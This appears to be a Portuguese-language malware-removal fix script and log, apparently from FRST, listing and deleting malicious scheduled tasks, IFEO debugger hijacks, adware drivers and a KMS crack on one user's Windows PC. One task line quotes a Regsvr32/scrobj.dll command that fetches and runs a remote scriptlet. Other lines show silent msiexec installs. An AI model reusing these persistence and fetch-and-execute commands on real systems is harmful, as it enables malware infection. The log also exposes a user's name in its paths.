Task: {4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} - System32\Tasks\R@1n-KMS\Office14ProPlus => wmic�
Task: {4DCED5E7-C4D2-48E0-9465-4A9A58089B29} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATEN��O�
Task: {5280B2E7-F127-40B0-AF3E-0A0674B4F874} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATEN��O�
Task: {77706C8A-94AF-4E57-B8E2-03CF78500731} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATEN��O�
Task: {7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATEN��O�
Task: {84A4D586-F069-481B-8AC3-656EF9F0018C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)�
Task: {8DC21957-9D43-435F-A928-0AC2F312D7CE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATEN��O�
Task: {A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATEN��O�
Task: {B682F9E1-06F9-433A-803D-072B9B9DB540} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATEN��O�
Task: {C1AC93B9-454A-437E-9027-1A2004FA261D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Nenhum Arquivo <==== ATEN��O�
Task: {C6392B5A-3A2E-4477-B098-2CA65E62ACE6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Nenhum Arquivo <==== ATEN��O�
Task: {CC21D6E8-24A8-4ABE-8FEB-697524D453D0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATEN��O�
Task: {CD7FFAF9-0423-42E9-A52D-5840EDA92753} - \BackgroundContainer Startup Task -> Nenhum Arquivo <==== ATEN��O�
Task: {E0A2BEA2-67D5-468B-87FB-8A28DC93D858} - System32\Tasks\T0528 => msiexec.exe /i [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] /q�
Task: {E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATEN��O�
Task: {F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll�
Task: {F961350E-3BDD-4EB4-9FDA-1DE60446BA52} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATEN��O�
Task: {FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} - \WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 -> Nenhum Arquivo <==== ATEN��O�
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] /q�
IFEO\DisplaySwitch.exe: [Debugger]�
IFEO\OSppSvc.exe: [Debugger] [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]�
IFEO\SppExtComObj.exe: [Debugger] [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]�
IFEO\taskmgr.exe: [Debugger]
2014-07-06 17:59 - 2014-07-06 17:59 - 0003584 _____ () C:\Users\ADEMIR MONTEIRO\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini�
2015-03-22 09:43 - 2015-03-22 09:43 - 0000227 _____ () C:\ProgramData\bc.ini�
2016-10-22 12:50 - 2016-10-22 12:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl�
2013-11-22 08:40 - 2013-11-22 08:40 - 0170344 _____ (Baidu, Inc.) C:\ProgramData\FileSplitUpLoad.dll�
2013-10-08 04:12 - 2013-10-08 04:12 - 0000119 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log�
2013-10-08 04:06 - 2013-10-08 04:08 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log�
2013-10-08 04:08 - 2013-10-08 04:10 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log�
2013-10-08 04:06 - 2013-10-08 04:06 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log�
2013-10-08 04:10 - 2013-10-08 04:12 - 0000108 _____ () C:\ProgramData\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}.log�
2017-04-17 19:11 - 2017-04-17 19:11 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\Firefox �
2017-04-17 19:10 - 2017-04-17 19:10 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Firefox�
2017-04-17 19:19 - 2017-04-17 19:19 - 00000000 ____D C:\Program Files (x86)\Firefox�
2017-04-17 19:12 - 2017-04-17 19:12 - 00000007 _____ C:\WINDOWS\SysWOW64\D50A.tmp �
2017-04-18 11:55 - 2017-04-18 11:55 - 00000000 ____D C:\ProgramData\SUPERAntiSpyware.com�
2017-04-18 11:54 - 2017-04-18 11:54 - 29831752 _____ (SUPERAntiSpyware) C:\Users\ADEMIR MONTEIRO\Downloads\SUPERAntiSpyware.exe�
2016-12-24 00:29 - 2016-12-24 00:29 - 0767688 _____ () C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\InstallHelper.exe�
2017-03-02 10:48 - 2017-03-02 10:48 - 0739904 _____ (Oracle Corporation) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u121-windows-au.exe�
2017-04-22 10:10 - 2017-04-22 10:10 - 0739904 _____ (Oracle Corporation) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u131-windows-au.exe�
2017-02-18 15:33 - 2017-02-18 15:38 - 44048864 _____ (Skype Technologies S.A.) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\SkypeSetup.exe�
2017-04-13 00:35 - 2017-04-13 00:35 - 2085648 _____ (Vitzo Limited ) C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\tmp6CD8.tmp.exe�
2016-07-10 01:16 - 2016-07-10 01:16 - 00026112 _____ () C:\Windows\KMS-R@1n.exe�
2016-07-10 01:16 - 2016-07-10 01:16 - 00005120 _____ () C:\WINDOWS\KMS-R@1nHook.exe�
2016-07-10 01:16 - 2016-07-10 01:16 - 00004096 _____ () C:\WINDOWS\KMS-R@1nHook.dll�
2017-04-17 19:19 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe�
2017-04-2C:\ProgramData\FileSplitUpLoad.dll�
C:\Users\Todos os Usu�rios\FileSplitUpLoad.dll 5 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll�
2017-04-25 09:28 - 2016-05-22 23:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll�
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\WINDOWS\system32\log�
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech�
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech�
2017-04-25 09:28 - 2016-05-22 23:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys�
2017-04-25 09:28 - 2016-05-19 03:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys�
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] /q�
HKLM-x32\...\Run: [PSafeTray] => C:\Program Files (x86)\PSafe\PSafeSysTray.exe [3370184 2014-07-11] (PSafe)�
HKLM-x32\...\Run: [PSafeWDS] => C:\Program Files (x86)\PSafe\PSafeWDS.exe [144584 2014-07-11] (PSafe S.A.)�
HKLM-x32\...\Run: [BAV mini setup] => "C:\ProgramData\Baidu\Antivirus\UNT233D.exe" /S /NOTRAY partner=RebootRun�
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATEN��O�
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo�
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo�
FirewallRules: [{6B446C8A-9266-46AB-85A6-E92C5974B43E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe�
FirewallRules: [{262684D5-BC5E-4F5C-8F2E-98E50A972023}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe�
FirewallRules: [{2F741DD0-F787-409E-A9D6-5CC26B96E1B6}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe�
FirewallRules: [{63A99386-ABB8-4DE5-B464-8682581FB0CB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe�
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116400 2017-04-13] () <==== ATEN��O
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participa��es Ltda
R2 Kitty; C:\Users\ADEMIR MONTEIRO\AppData\Local\Kitty\Kitty.dll [583168 2017-04-25] (kitty) [Arquivo n�o assinado] <==== ATEN��O�
R2 KMS-R@1n; C:\Windows\KMS-R@1n.exe [26112 2016-07-10] () [Arquivo n�o assinado]�
R2 PSafeSVC; C:\Program Files (x86)\PSafe\psafesvc.exe [2605768 2014-07-11] (PSafe S/A)�
R2 PSafeWD; C:\Program Files (x86)\PSafe\PSafeWD.exe [266952 2014-07-11] (PSafe S.A.)�
R2 WinSAPSvc; C:\Users\ADEMIR MONTEIRO\AppData\Roaming\WinSAPSvc\WinSAP.dll [508928 2017-04-25] (winsap) [Arquivo n�o assinado] <==== ATEN��O�
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participa��es Ltda) <==== ATEN��O�
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe�
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe�
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe�
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Hosts:
Reboot:
end
*****************
Processos fechados com sucesso.
Chrome StartupUrls => não encontrado (a).
Chrome DefaultSearchURL => não encontrado (a).
Chrome DefaultSearchKeyword => não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => valor não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\BaiduAntivirusIconLock => chave não encontrado (a).
HKCR\CLSID\{0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => chave não encontrado (a).
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => chave não encontrado (a).
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Erro ao configurar valor.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Erro ao configurar valor.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida
HKCR\Wow6432Node\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKCR\Wow6432Node\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F373340-7552-468F-805A-12372F3EBBA3} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{864BC306-9BC2-4E24-860C-052C2BDED33D} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C13CF54-132B-47A3-A9C3-46781DDE17AA} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\rundetector => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\Milimili => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{25AF1857-93F1-41E3-95BA-7EE079948513} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\R@1n-KMS\Office14ProPlus => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\R@1n-KMS\Office14ProPlus => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4DCED5E7-C4D2-48E0-9465-4A9A58089B29} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5280B2E7-F127-40B0-AF3E-0A0674B4F874} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{77706C8A-94AF-4E57-B8E2-03CF78500731} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{84A4D586-F069-481B-8AC3-656EF9F0018C} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DC21957-9D43-435F-A928-0AC2F312D7CE} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B682F9E1-06F9-433A-803D-072B9B9DB540} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C1AC93B9-454A-437E-9027-1A2004FA261D} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-Weekend => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6392B5A-3A2E-4477-B098-2CA65E62ACE6} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC21D6E8-24A8-4ABE-8FEB-697524D453D0} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FFAF9-0423-42E9-A52D-5840EDA92753} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BackgroundContainer Startup Task => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0A2BEA2-67D5-468B-87FB-8A28DC93D858} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\T0528 => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} => chave não encontrado (a).
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F961350E-3BDD-4EB4-9FDA-1DE60446BA52} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 => chave não encontrado (a).
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Atalho argumento removido (a) com sucesso..
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Atalho argumento removido (a) com sucesso..
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor não encontrado (a).
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => chave não encontrado (a).
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OSppSvc.exe => chave não encontrado (a).
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SppExtComObj.exe => chave não encontrado (a).
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini " => não encontrado (a).
"C:\ProgramData\bc.ini " => não encontrado (a).
"C:\ProgramData\DP45977C.lfl " => não encontrado (a).
"C:\ProgramData\FileSplitUpLoad.dll " => não encontrado (a).
"C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log " => não encontrado (a).
"C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log " => não encontrado (a).
"C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log " => não encontrado (a).
"C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log " => não encontrado (a).
"C:\ProgramData\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}.log " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\Firefox " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Firefox " => não encontrado (a).
"C:\Program Files (x86)\Firefox " => não encontrado (a).
"C:\WINDOWS\SysWOW64\D50A.tmp " => não encontrado (a).
"C:\ProgramData\SUPERAntiSpyware.com " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\Downloads\SUPERAntiSpyware.exe " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\InstallHelper.exe " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u121-windows-au.exe " => não encontrado (a).
